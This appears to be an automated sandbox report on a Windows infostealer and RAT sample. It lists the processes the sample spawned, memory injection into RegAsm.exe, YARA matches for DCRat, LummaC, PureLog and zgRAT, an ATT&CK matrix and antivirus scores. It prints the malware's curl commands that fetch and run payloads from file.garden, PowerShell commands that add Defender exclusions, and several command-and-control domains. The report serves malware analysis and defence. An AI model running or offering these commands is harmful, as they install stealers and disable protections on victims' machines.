Source: physmeme.exe, 00000009.00000002.1524140156.0000000003EC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: captainynfanw.shop
Source: physmeme.exe, 00000009.00000002.1524140156.0000000003EC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: surveriysiop.shop
Source: physmeme.exe, 00000009.00000002.1524140156.0000000003EC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tiddymarktwo.shop

Writes to foreign memory regions

Source: C:\Windows\Speech\physmeme.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44C000	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44F000	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 45F000	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: FCB008	Jump to behavior

Source: C:\Users\user\Desktop\seoI30IZZr.exe

Code function: 0_2_00007FF78661ECD0 pow,pow,pow,sqrt,mouse_event,mouse_event,_invalid_parameter_noinfo_noreturn,

0_2_00007FF78661ECD0

Source: C:\Users\user\Desktop\seoI30IZZr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe	Jump to behavior
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Process created: C:\Windows\Speech\kdmapper.exe "C:\Windows\Speech\kdmapper.exe"	Jump to behavior
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe	Jump to behavior
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Process created: C:\Windows\Speech\physmeme.exe "C:\Windows\Speech\physmeme.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat" "	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Edge\msedge.exe "C:\Edge/msedge.exe"	Jump to behavior
Source: C:\Edge\msedge.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lar3wzdd\lar3wzdd.cmdline"	Jump to behavior
Source: C:\Edge\msedge.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iikyx55j\iikyx55j.cmdline"	Jump to behavior
Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\WmiPrvSE.exe'	Jump to behavior
Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Edge\msedge.exe'	Jump to behavior
Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\FVbPldJoKd.bat"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8FC0.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC1C202AE04657426D812F38F5265327B.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9270.tmp" "c:\Windows\System32\CSC90DD46E6AB146EBB2673718B916635.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\WmiPrvSE.exe "C:\Users\user\AppData\Local\WmiPrvSE.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\WmiPrvSE.exe "C:\Users\user\AppData\Local\WmiPrvSE.exe"
Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\qgs8WdcQ4J.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Windows\Speech\kdmapper.exe

Code function: 5_2_0061F654 cpuid

5_2_0061F654

Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: GetLocaleInfoEx,FormatMessageA,		0_2_00007FF78662D960
Source: C:\Windows\Speech\kdmapper.exe	Code function: GetLocaleInfoW,GetNumberFormatW,		5_2_0061AF0F

Source: C:\Windows\Speech\physmeme.exe	Queries volume information: C:\Windows\Speech\physmeme.exe VolumeInformation	Jump to behavior
Source: C:\Edge\msedge.exe	Queries volume information: C:\Edge\msedge.exe VolumeInformation	Jump to behavior
Source: C:\Edge\msedge.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Edge\msedge.exe	Queries volume information: C:\Edge\msedge.exe VolumeInformation
Source: C:\Edge\msedge.exe	Queries volume information: C:\Edge\msedge.exe VolumeInformation
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Queries volume information: C:\Users\user\AppData\Local\WmiPrvSE.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Edge\msedge.exe	Queries volume information: C:\Edge\msedge.exe VolumeInformation
Source: C:\Edge\msedge.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Queries volume information: C:\Users\user\AppData\Local\WmiPrvSE.exe VolumeInformation

Source: C:\Users\user\Desktop\seoI30IZZr.exe

Code function: 0_2_00007FF78662D7DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00007FF78662D7DC

Source: C:\Windows\Speech\kdmapper.exe

Code function: 5_2_0060B146 GetVersionExW,

5_2_0060B146

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: seoI30IZZr.exe, seoI30IZZr.exe, 00000000.00000000.1439614504.00007FF786630000.00000002.00000001.01000000.00000003.sdmp, seoI30IZZr.exe, 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmp

Binary or memory string: ollydbg.exe

Source: C:\Windows\SysWOW64\cmd.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 00000010.00000002.1726451234.0000000012879000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msedge.exe PID: 4900, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WmiPrvSE.exe PID: 5656, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 5.3.kdmapper.exe.530c6cf.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.kdmapper.exe.69bb6cf.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.msedge.exe.120000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.kdmapper.exe.530c6cf.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.kdmapper.exe.69bb6cf.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000003.1497197770.000000000696D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.1497756532.00000000052BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.1654958130.0000000000122000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: C:\Edge\msedge.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\WmiPrvSE.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\Speech\kdmapper.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: 5.3.kdmapper.exe.530c6cf.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.kdmapper.exe.69bb6cf.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.msedge.exe.120000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.kdmapper.exe.530c6cf.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.kdmapper.exe.69bb6cf.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Edge\msedge.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\WmiPrvSE.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\Speech\kdmapper.exe, type: DROPPED

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 00000010.00000002.1726451234.0000000012879000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msedge.exe PID: 4900, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WmiPrvSE.exe PID: 5656, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 5.3.kdmapper.exe.530c6cf.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.kdmapper.exe.69bb6cf.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.msedge.exe.120000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.kdmapper.exe.530c6cf.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.kdmapper.exe.69bb6cf.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000003.1497197770.000000000696D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.1497756532.00000000052BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.1654958130.0000000000122000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: C:\Edge\msedge.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\WmiPrvSE.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\Speech\kdmapper.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: 5.3.kdmapper.exe.530c6cf.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.kdmapper.exe.69bb6cf.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.msedge.exe.120000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.kdmapper.exe.530c6cf.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.kdmapper.exe.69bb6cf.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Edge\msedge.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\WmiPrvSE.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\Speech\kdmapper.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	11 Scripting	Valid Accounts	111 Windows Management Instrumentation	11 Scripting	1 DLL Side-Loading	11 Disable or Modify Tools	21 Input Capture	1 System Time Discovery	1 Taint Shared Content	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	411 Process Injection	111 Deobfuscate/Decode Files or Information	LSASS Memory	3 File and Directory Discovery	Remote Desktop Protocol	1 Screen Capture	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Exploitation for Client Execution	21 Registry Run Keys / Startup Folder	21 Registry Run Keys / Startup Folder	4 Obfuscated Files or Information	Security Account Manager	37 System Information Discovery	SMB/Windows Admin Shares	21 Input Capture	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	3 Command and Scripting Interpreter	Login Hook	Login Hook	3 Software Packing	NTDS	561 Security Software Discovery	Distributed Component Object Model	3 Clipboard Data	113 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 PowerShell	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	241 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 File Deletion	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	132 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	241 Virtualization/Sandbox Evasion	Proc Filesystem	1 Remote System Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	411 Process Injection	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
seoI30IZZr.exe	55%	ReversingLabs	Win64.Spyware.Lummastealer
seoI30IZZr.exe	100%	Avira	HEUR/AGEN.1317356
seoI30IZZr.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Edge\L6lFlVnd0szYUYb26bZc.vbe	100%	Avira	VBS/Runner.VPG
C:\Windows\Speech\kdmapper.exe	100%	Avira	VBS/Runner.VPG
C:\Users\user\AppData\Local\Temp\qgs8WdcQ4J.bat	100%	Avira	BAT/Delbat.C
C:\Edge\msedge.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\Desktop\AznuGYbp.log	100%	Avira	TR/AVI.Agent.updqb
C:\Users\user\AppData\Local\Temp\FVbPldJoKd.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\Desktop\KiGKqBgX.log	100%	Avira	TR/PSW.Agent.qngqt
C:\Users\user\Desktop\EagcoYZU.log	100%	Avira	TR/AVI.Agent.updqb
C:\Users\user\Desktop\OJAsYAeC.log	100%	Avira	TR/PSW.Agent.qngqt
C:\Users\user\AppData\Local\WmiPrvSE.exe	100%	Avira	HEUR/AGEN.1323342
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	100%	Joe Sandbox ML
C:\Windows\Speech\kdmapper.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\oYbYVUjG.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\jsWPmlvb.log	100%	Joe Sandbox ML
C:\Edge\msedge.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\mOEXVCEF.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\KiGKqBgX.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\OJAsYAeC.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\rWfFWfLI.log	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\WmiPrvSE.exe	100%	Joe Sandbox ML
C:\Edge\msedge.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\AppData\Local\WmiPrvSE.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\AznuGYbp.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\ERJdElGX.log	29%	ReversingLabs
C:\Users\user\Desktop\EagcoYZU.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\IlfCUBRc.log	29%	ReversingLabs
C:\Users\user\Desktop\KiGKqBgX.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
